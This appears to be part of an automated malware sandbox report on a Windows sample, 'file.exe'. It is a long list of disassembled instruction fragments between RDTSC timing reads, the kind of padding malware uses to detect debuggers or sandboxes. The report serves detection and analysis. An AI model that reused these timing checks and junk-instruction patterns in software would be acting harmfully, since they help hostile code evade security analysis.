                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E9AFC second address: 11E9B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2E044F2608h 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E9B1E second address: 11E9B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED591 second address: 11ED595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED722 second address: 11ED72A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED72A second address: 11ED740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2E044F2600h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED740 second address: 11ED744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED744 second address: 11ED754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F2E044F25FEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDE69 second address: 11EDE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDE6E second address: 11EDE95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F2E044F25FCh 0x0000000c popad 0x0000000d jmp 00007F2E044F25FAh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDE95 second address: 11EDE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EFE88 second address: 11EFEC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2E044F25F6h 0x0000000a jc 00007F2E044F25F6h 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F2E044F2608h 0x00000019 jmp 00007F2E044F25FCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EFEC2 second address: 11EFEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2E050A57D7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F42EF second address: 11F4328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 ja 00007F2E044F25F8h 0x0000000d jl 00007F2E044F260Fh 0x00000013 jp 00007F2E044F25F6h 0x00000019 jmp 00007F2E044F2603h 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 jg 00007F2E044F25F6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4328 second address: 11F4335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4335 second address: 11F4339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4339 second address: 11F433D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90E7E second address: 4C90E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90E82 second address: 4C90E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90E86 second address: 4C90E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90E8C second address: 4C90E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90E92 second address: 4C90E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CEF second address: 4C80CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CF3 second address: 4C80CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80CF9 second address: 4C80D10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80D10 second address: 4C80D2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80D2D second address: 4C80D51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2E050A57CCh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C600C0 second address: 4C600F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2E044F2600h 0x00000009 sub ecx, 61E80E28h 0x0000000f jmp 00007F2E044F25FBh 0x00000014 popfd 0x00000015 mov ch, 97h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C600F2 second address: 4C600F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C600F6 second address: 4C60113 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60113 second address: 4C60118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60118 second address: 4C60129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60129 second address: 4C60149 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2E050A57D5h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60149 second address: 4C60159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F25FCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60159 second address: 4C6015D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80ABE second address: 4C80AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jmp 00007F2E044F2600h 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 push ecx 0x00000012 mov bl, 53h 0x00000014 pop esi 0x00000015 mov di, 547Ah 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov eax, 67C44C59h 0x00000024 mov di, cx 0x00000027 popad 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80AF1 second address: 4C80B02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov esi, edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80B02 second address: 4C80B0E instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 movzx ecx, di 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C805BA second address: 4C805C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C805C0 second address: 4C805C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C805C4 second address: 4C805C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C805C8 second address: 4C805D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C805D7 second address: 4C805DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C805DB second address: 4C805F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C805F4 second address: 4C80604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57CCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9010D second address: 4C9012A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9012A second address: 4C9013A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57CCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0030 second address: 4CD00FD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2E044F2600h 0x00000008 adc ecx, 03151E48h 0x0000000e jmp 00007F2E044F25FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ebx 0x00000019 movzx esi, dx 0x0000001c popad 0x0000001d popad 0x0000001e push esi 0x0000001f pushad 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F2E044F2606h 0x00000027 sub cx, 43D8h 0x0000002c jmp 00007F2E044F25FBh 0x00000031 popfd 0x00000032 movzx ecx, dx 0x00000035 popad 0x00000036 pushfd 0x00000037 jmp 00007F2E044F2605h 0x0000003c and cl, 00000076h 0x0000003f jmp 00007F2E044F2601h 0x00000044 popfd 0x00000045 popad 0x00000046 mov dword ptr [esp], ebp 0x00000049 pushad 0x0000004a mov si, E603h 0x0000004e call 00007F2E044F2608h 0x00000053 push ecx 0x00000054 pop edi 0x00000055 pop eax 0x00000056 popad 0x00000057 mov ebp, esp 0x00000059 jmp 00007F2E044F25FDh 0x0000005e pop ebp 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F2E044F25FDh 0x00000066 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD00FD second address: 4CD010D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57CCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD010D second address: 4CD0111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0271 second address: 4CA02C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0E59C2E2h 0x00000008 push ebx 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 mov cl, dl 0x00000013 pushfd 0x00000014 jmp 00007F2E050A57CCh 0x00000019 sub cl, 00000078h 0x0000001c jmp 00007F2E050A57CBh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F2E050A57D6h 0x0000002a mov eax, dword ptr [ebp+08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA02C2 second address: 4CA02C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA02C6 second address: 4CA02CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA02CA second address: 4CA02D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804C2 second address: 4C80503 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2E050A57D4h 0x00000008 adc eax, 4A279718h 0x0000000e jmp 00007F2E050A57CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 jmp 00007F2E050A57CFh 0x0000001e push eax 0x0000001f push edx 0x00000020 mov ebx, ecx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80503 second address: 4C80532 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2E044F2602h 0x00000008 adc si, 38A8h 0x0000000d jmp 00007F2E044F25FBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80532 second address: 4C80555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F2E050A57D1h 0x0000000a jmp 00007F2E050A57CBh 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90D52 second address: 4C90D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90D58 second address: 4C90D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90D5C second address: 4C90DAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F2E044F25FEh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F2E044F25FEh 0x0000001a and ah, FFFFFF98h 0x0000001d jmp 00007F2E044F25FBh 0x00000022 popfd 0x00000023 mov di, ax 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90DAA second address: 4C90DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C90DAE second address: 4C90DB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA008B second address: 4CA0091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA0091 second address: 4CA00C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx edi, cx 0x0000000e push esi 0x0000000f pushfd 0x00000010 jmp 00007F2E044F25FDh 0x00000015 jmp 00007F2E044F25FBh 0x0000001a popfd 0x0000001b pop esi 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA00C3 second address: 4CA00C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA00C7 second address: 4CA00CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CA00CB second address: 4CA00D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC075A second address: 4CC077B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2E044F2601h 0x00000008 pop ecx 0x00000009 mov di, 1024h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC077B second address: 4CC0818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F2E050A57D0h 0x0000000b adc ecx, 51373ED8h 0x00000011 jmp 00007F2E050A57CBh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c call 00007F2E050A57D4h 0x00000021 pushfd 0x00000022 jmp 00007F2E050A57D2h 0x00000027 sbb ax, 3068h 0x0000002c jmp 00007F2E050A57CBh 0x00000031 popfd 0x00000032 pop ecx 0x00000033 mov dx, 88ACh 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a jmp 00007F2E050A57CBh 0x0000003f xchg eax, ecx 0x00000040 jmp 00007F2E050A57D6h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov si, 30D3h 0x0000004d mov ecx, 591B072Fh 0x00000052 popad 0x00000053 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC0818 second address: 4CC084F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F2E044F25FAh 0x00000013 sub ch, FFFFFF88h 0x00000016 jmp 00007F2E044F25FBh 0x0000001b popfd 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC084F second address: 4CC08F6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2E050A57D8h 0x00000008 adc esi, 138299E8h 0x0000000e jmp 00007F2E050A57CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007F2E050A57D8h 0x0000001b mov cx, FAE1h 0x0000001f pop ecx 0x00000020 popad 0x00000021 mov eax, dword ptr [76FB65FCh] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F2E050A57D6h 0x0000002f adc ah, FFFFFFA8h 0x00000032 jmp 00007F2E050A57CBh 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F2E050A57D8h 0x0000003e adc ecx, 01106108h 0x00000044 jmp 00007F2E050A57CBh 0x00000049 popfd 0x0000004a popad 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70016 second address: 4C7003E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2E044F2607h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7003E second address: 4C70093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ecx, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F2E050A57D9h 0x00000015 sbb esi, 487B29D6h 0x0000001b jmp 00007F2E050A57D1h 0x00000020 popfd 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70093 second address: 4C7011D instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F2E044F2606h 0x00000011 and si, 1F28h 0x00000016 jmp 00007F2E044F25FBh 0x0000001b popfd 0x0000001c jmp 00007F2E044F2608h 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007F2E044F2602h 0x00000028 adc si, 2CB8h 0x0000002d jmp 00007F2E044F25FBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F2E044F2605h 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7011D second address: 4C70152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2E050A57CAh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and esp, FFFFFFF8h 0x0000000f jmp 00007F2E050A57D1h 0x00000014 xchg eax, ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2E050A57CDh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70152 second address: 4C701A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F2E044F25FFh 0x0000000f pushfd 0x00000010 jmp 00007F2E044F2608h 0x00000015 sbb eax, 323B3638h 0x0000001b jmp 00007F2E044F25FBh 0x00000020 popfd 0x00000021 pop eax 0x00000022 push ebx 0x00000023 pop edi 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C701A1 second address: 4C701A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C701A7 second address: 4C701E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F2E044F2600h 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx ebx, cx 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2E044F2602h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C701E9 second address: 4C701EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C701EF second address: 4C701F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
